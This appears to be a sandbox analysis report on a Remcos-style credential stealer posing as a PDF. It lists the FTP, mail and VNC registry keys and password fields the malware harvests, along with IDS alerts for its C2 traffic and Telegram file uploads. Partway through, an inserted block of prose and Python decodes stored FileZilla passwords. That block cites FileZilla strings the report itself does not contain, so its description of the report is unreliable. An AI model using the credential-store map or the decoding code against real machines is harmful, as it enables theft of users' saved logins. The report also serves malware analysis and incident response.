Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 12.0.host.exe.240000.0.unpack String decryptor: User
Source: 12.0.host.exe.240000.0.unpack String decryptor: Host
Source: 12.0.host.exe.240000.0.unpack String decryptor: Port
Source: 12.0.host.exe.240000.0.unpack String decryptor: hdfzpysvpzimorhk
Source: 12.0.host.exe.240000.0.unpack String decryptor: WinSCP
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 12.0.host.exe.240000.0.unpack String decryptor: HostName
Source: 12.0.host.exe.240000.0.unpack String decryptor: UserName
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: PublicKeyFile
Source: 12.0.host.exe.240000.0.unpack String decryptor: PortNumber
Source: 12.0.host.exe.240000.0.unpack String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 12.0.host.exe.240000.0.unpack String decryptor: WinSCP
Source: 12.0.host.exe.240000.0.unpack String decryptor: ABCDEF
Source: 12.0.host.exe.240000.0.unpack String decryptor: Flash FXP
Source: 12.0.host.exe.240000.0.unpack String decryptor: port
Source: 12.0.host.exe.240000.0.unpack String decryptor: user
Source: 12.0.host.exe.240000.0.unpack String decryptor: pass
Source: 12.0.host.exe.240000.0.unpack String decryptor: quick.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: Sites.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FlashFXP\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FlashFXP\
Source: 12.0.host.exe.240000.0.unpack String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 12.0.host.exe.240000.0.unpack String decryptor: FTP Navigator
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FTP Navigator\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: No Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: User
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmartFTP
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 12.0.host.exe.240000.0.unpack String decryptor: WS_FTP
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: HOST
Source: 12.0.host.exe.240000.0.unpack String decryptor: PWD=
Source: 12.0.host.exe.240000.0.unpack String decryptor: PWD=
Source: 12.0.host.exe.240000.0.unpack String decryptor: FtpCommander
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \cftp\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Password=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;User=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Server=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Port=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Port=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Password=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;User=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Anonymous=
Source: 12.0.host.exe.240000.0.unpack String decryptor: FTPGetter
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FTPGetter\servers.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_ip>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_ip>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_ip>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_name>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_name>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_user_name>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_password>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_password>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_user_password>
Source: 12.0.host.exe.240000.0.unpack String decryptor: FTPGetter
Source: 12.0.host.exe.240000.0.unpack String decryptor: The Bat!
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: \The Bat!
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.CFN
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.CFN
Source: 12.0.host.exe.240000.0.unpack String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 12.0.host.exe.240000.0.unpack String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 12.0.host.exe.240000.0.unpack String decryptor: Becky!
Source: 12.0.host.exe.240000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 12.0.host.exe.240000.0.unpack String decryptor: DataDir
Source: 12.0.host.exe.240000.0.unpack String decryptor: Folder.lst
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Mailbox.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: PassWd
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTPServer
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: MailAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Becky!
Source: 12.0.host.exe.240000.0.unpack String decryptor: Outlook
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: IMAP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3 Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: HTTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: IMAP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3 Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: HTTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Mail App
Source: 12.0.host.exe.240000.0.unpack String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: SchemaId
Source: 12.0.host.exe.240000.0.unpack String decryptor: pResourceElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pIdentityElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pPackageSid
Source: 12.0.host.exe.240000.0.unpack String decryptor: pAuthenticatorElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: syncpassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: mailoutgoing
Source: 12.0.host.exe.240000.0.unpack String decryptor: FoxMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 12.0.host.exe.240000.0.unpack String decryptor: Executable
Source: 12.0.host.exe.240000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 12.0.host.exe.240000.0.unpack String decryptor: FoxmailPath
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Storage\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Storage\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.stg
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.stg
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3Host
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTPHost
Source: 12.0.host.exe.240000.0.unpack String decryptor: IncomingServer
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: MailAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Opera Mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: opera:
Source: 12.0.host.exe.240000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
Source: 12.0.host.exe.240000.0.unpack String decryptor: PocoMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Pocomail\accounts.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: POPPass
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTPPass
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTP
Source: 12.0.host.exe.240000.0.unpack String decryptor: eM Client
Source: 12.0.host.exe.240000.0.unpack String decryptor: eM Client\accounts.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: eM Client
Source: 12.0.host.exe.240000.0.unpack String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: "Username":"
Source: 12.0.host.exe.240000.0.unpack String decryptor: "Secret":"
Source: 12.0.host.exe.240000.0.unpack String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 12.0.host.exe.240000.0.unpack String decryptor: "ProviderName":"
Source: 12.0.host.exe.240000.0.unpack String decryptor: o6806642kbM7c5
Source: 12.0.host.exe.240000.0.unpack String decryptor: Mailbird
Source: 12.0.host.exe.240000.0.unpack String decryptor: SenderIdentities
Source: 12.0.host.exe.240000.0.unpack String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Mailbird\Store\Store.db
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server_Host
Source: 12.0.host.exe.240000.0.unpack String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Username
Source: 12.0.host.exe.240000.0.unpack String decryptor: EncryptedPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: Mailbird
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 4.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 3.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\RealVNC\vncserver
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 4.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 3.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\ORL\WinVNC3
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: TightVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: TightVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: PasswordViewOnly
Source: 12.0.host.exe.240000.0.unpack String decryptor: TightVNC ControlPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: ControlPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: TigerVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TigerVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: JDownloader 2.0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 11_2_004315EC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 14_2_00404423
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 17_2_004315EC
Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_0cda5b99-4
Source: Payment_Slip.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: Payment_Slip.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0041A01B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0040B28E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0040838E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_004087A0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_00407848
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004068CD FindFirstFileW,FindNextFileW, 11_2_004068CD
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0044BA59 FindFirstFileExA, 11_2_0044BA59
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_00417AAB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0040AC78
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407C87
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_0041A01B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 17_2_0040B28E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_0040838E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_004087A0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_00407848
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004068CD FindFirstFileW,FindNextFileW, 17_2_004068CD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0044BA59 FindFirstFileExA, 17_2_0044BA59
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_00417AAB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040AC78
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_00406D28
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 4x nop then jmp 09617E79h 0_2_0961865C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 4x nop then jmp 076D7009h 7_2_076D77EC
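The string-decryptor output above (FileZilla, CoreFTP, WinSCP, FlashFXP, FTP Navigator, SmartFTP, WS_FTP, FTP Commander, FTPGetter, then the mail and VNC clients) is the stealer's list of credential stores, and the `<Pass encoding="base64">` markers show why FileZilla is such an easy target: its saved passwords are base64-encoded, not encrypted. The Python below is an added example, not code from the report or from the sample. It parses a constructed recentservers.xml the way the stealer does (both the base64 and the legacy clear-text form), produces the rotation list a responder needs, and expands the on-disk artifact locations named in the decryptor output so they can be checked on the victim. FTPGetter's base directory and the HKCU hive for the CoreFTP and WinSCP keys are assumptions.

```python
"""Credential-exposure triage for the FTP-client artifacts the sample's
string decryptor enumerates.  Added example, not code from the report or the
sample.  The XML is constructed to mirror FileZilla's real on-disk layout."""
from __future__ import annotations

import base64
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample.  The first entry uses the <Pass encoding="base64"> form
# referenced in the decryptor strings; the second is the bare <Pass> form
# written by older FileZilla builds, which the stealer also handles.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">U3VwZXJTZWNyZXQxMjM=</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass>legacy-clear-text</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""


@dataclass
class FtpCred:
    host: str
    port: int
    user: str
    password: str  # recovered exactly as the stealer recovers it


def parse_filezilla(xml_text: str) -> list[FtpCred]:
    """Return every <Server> entry with its stored password recovered.
    FileZilla protects saved passwords with base64 only, so recovery is a
    single decode; a bare <Pass> is taken verbatim."""
    root = ET.fromstring(xml_text)  # local file; stdlib ET expands no external entities
    creds: list[FtpCred] = []
    for srv in root.iter("Server"):
        pass_el = srv.find("Pass")
        if pass_el is None or not pass_el.text:
            continue  # anonymous or key-only entry: nothing to rotate
        raw = pass_el.text.strip()
        if pass_el.get("encoding") == "base64":
            password = base64.b64decode(raw).decode("utf-8", "replace")
        else:
            password = raw
        creds.append(FtpCred(
            host=(srv.findtext("Host") or "").strip(),
            port=int(srv.findtext("Port") or 0),
            user=(srv.findtext("User") or "").strip(),
            password=password,
        ))
    return creds


def rotation_list(creds: list[FtpCred]) -> list[str]:
    """What the responder hands to the account owners: which accounts on
    which hosts must be rotated.  The password is reduced to its length so
    the list can be circulated without leaking it again."""
    return [f"{c.user}@{c.host}:{c.port} (password length {len(c.password)})"
            for c in creds]


def artifact_paths(env: dict[str, str]) -> list[str]:
    """Expand the locations named in the decryptor output for checking on the
    victim (os.path.exists / reg query).  Registry keys are listed as-is; the
    HKCU hive and FTPGetter living under APPDATA are assumptions."""
    appdata = env.get("APPDATA", r"C:\Users\user\AppData\Roaming")
    sysdrive = env.get("SystemDrive", "C:")
    return [
        appdata + r"\FileZilla\recentservers.xml",
        appdata + r"\Ipswitch\WS_FTP\Sites\ws_ftp.ini",
        appdata + r"\FTPGetter\servers.xml",          # base dir assumed
        appdata + r"\SmartFTP\Client 2.0\Favorites\Quick Connect",
        sysdrive + r"\FTP Navigator\Ftplist.txt",
        sysdrive + r"\Program Files (x86)\FTP Commander\Ftplist.txt",
        sysdrive + r"\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt",
        sysdrive + r"\cftp\Ftplist.txt",
        r"HKCU\SOFTWARE\FTPWare\COREFTP\Sites",        # hive assumed
        r"HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",  # hive assumed
    ]
```

Run `parse_filezilla` over the victim's real recentservers.xml and every credential it returns should be treated as compromised from the moment the stealer ran; the rotation list, not the file, is what leaves the IR channel.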

Networking

Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49720 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49724 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49722 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49725 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49721 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49723 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49764 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49755 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49771 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49744 -> 149.154.167.220:443
